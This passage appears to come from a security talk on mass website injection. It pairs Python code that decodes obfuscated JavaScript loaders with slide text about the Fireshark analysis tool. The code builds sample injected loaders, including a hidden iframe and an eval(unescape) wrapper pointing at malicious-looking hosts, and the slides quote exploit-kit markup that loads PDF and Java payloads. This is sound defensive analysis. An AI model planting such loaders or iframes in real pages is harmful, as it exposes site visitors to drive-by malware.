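def decode_hex_pairs(script_text):
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_LIT_RE.findall(script_text)]


# eval(unescape("%3c%69"+"%66%72"+...)) : join the pieces, then undo %XX and %uXXXX.
UNESCAPE_RE = re.compile(r'unescape\(\s*((?:"[^"]*"\s*\+?\s*)+)\)')
PCT_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def decode_unescape_concat(script_text):
    out = []
    for m in UNESCAPE_RE.finditer(script_text):
        joined = "".join(re.findall(r'"([^"]*)"', m.group(1)))
        out.append(PCT_RE.sub(lambda p: chr(int(p.group(1) or p.group(2), 16)), joined))
    return out


# ---- constructed samples ---------------------------------------------------------

INJECTED_URL = ("http://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru:8080/"
                "ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/")
NOISE = "(!&#$)@^"   # the characters Variation #1's regex removes


def sample_variation1():
    """Loader in the shape of Variation #1, with its literals padded using NOISE."""
    noisy = "".join(c + NOISE[i % len(NOISE)] for i, c in enumerate(INJECTED_URL))
    strip = r"/\(|\!|&|#|\$|\)|@|\^/ig"
    return ("var q=document.createElement('s(c#r!i(p$t'.replace(%s,''));"
            "q.setAttribute('src','%s'.replace(%s,''));" % (strip, noisy, strip))


# The hex literal from the Injection Example #3 slide (two OCR misreads corrected).
HEX_SAMPLE = "var rfdd37='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B7661';"

IFRAME = ('<iframe style="visibility: hidden;" '
          'src="http://sportgun.pl.ua/st/go.php?sid=2&" name="c01"></iframe>')


def sample_unescape():
    """The hidden iframe from the Deobfuscated DOM slide, percent-encoded and split into
    "..."+"..." pieces the way the howtofindmyip.com snippet is."""
    enc = "".join("%%%02x" % ord(c) for c in IFRAME)
    pieces = [enc[i:i + 18] for i in range(0, len(enc), 18)]
    return '<script>eval(unescape(%s));</script>' % "+".join('"%s"' % p for p in pieces)


if __name__ == "__main__":
    print(decode_replace_strip(sample_variation1()))
    print(decode_hex_pairs(HEX_SAMPLE))
    print(decode_unescape_concat(sample_unescape()))
```

The hex literal on the Injection Example #3 slide decodes to the start of a second-stage script, "<script>function check_content(){va", which is why that loader needs the parseInt/fromCharCode routine shown on the slide. Decoding statically, as here, is what makes the result safe to log next to the connection record instead of requiring the page to be rendered again.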
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Exploit Kit

uplevelgmno.vn.ua

function is_s[name illegible](tybay, prec) {

<object height="1" width="1" data="http://uplevelgmno.vn.ua/111/sv777/pdf.php" type="application/pdf">
<param value="1.pdf" name="src" />
</object>

<applet height="255" width="462" archive="window.jar" code="dev.s.AdgredY.class">
<param value="http://uplevelgmno.vn.ua/111/sv777/load.php?spl=javad" name="data" />
<param value="1" name="cc" />
</applet>

eval('edc = e' + tt + 'l;');
eval('function lala0(rx) { return set_fdh(rx); }');
for (i=0; i<12; i++) {
  var i_plus = i+1;
  r += 'function lala'+i_plus+'(rx) {return lala'+i+'(   [cut off in the screenshot]
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Observations from Injection attack #3

The bad guys are tracking/hiding; redundant redirectors are common

Exploits in use are current, i.e. all platforms/browsers are targeted

Exploit kits are easily attainable and setup is quick

Many kits serve per-user polymorphic exploits/malware, so traditional AV signatures are always behind
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From 1.0 to 1.1.

FIRESHARK RELEASES

Fireshark 1.0

Released at Black Hat Europe, April 2010

- Firefox browser plugin

- Perl post-processing

- Cymru ASN

- GraphViz
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Fireshark 1.0

YAML log format

Scripts:

GraphViz.pl

IngressEgress.pl
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Fireshark 1.1 (release in November '10)

XUL GUI front-end

- Shows network traffic

- Redirection chains

- DOM/SOURCE/DIFF

- Top destination and source URLs

- Suspected redirectors/exploit sites

Configurable options

Output in JSON (1.0 was in YAML)
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Get it!...

FIRESHARK: WHERE TO DOWNLOAD

Download Fireshark 1.0

http://fireshark.org/

The Fireshark Project

Free (GPL v3)

Open source

Perl/Python scripts included for post-processing
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The end...

CONCLUSION + Q&A

Conclusions/Take-away

Compromised websites:

- Increase of 225% over the last 12 months

- Frequently updated to contain fresh links

Current tools are insufficient for monitoring and analyzing mass URL injections

Use Fireshark for:

- Mass injection analysis

- Redirection chaining

- Content profiling
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Questions?

Contact:

Stephan Chenette
Twitter: StephanChenette
Email: stephan@packetsector.net

Fireshark Feedback:

Join the Fireshark mailing list! or
send an email to feedback@fireshark.org
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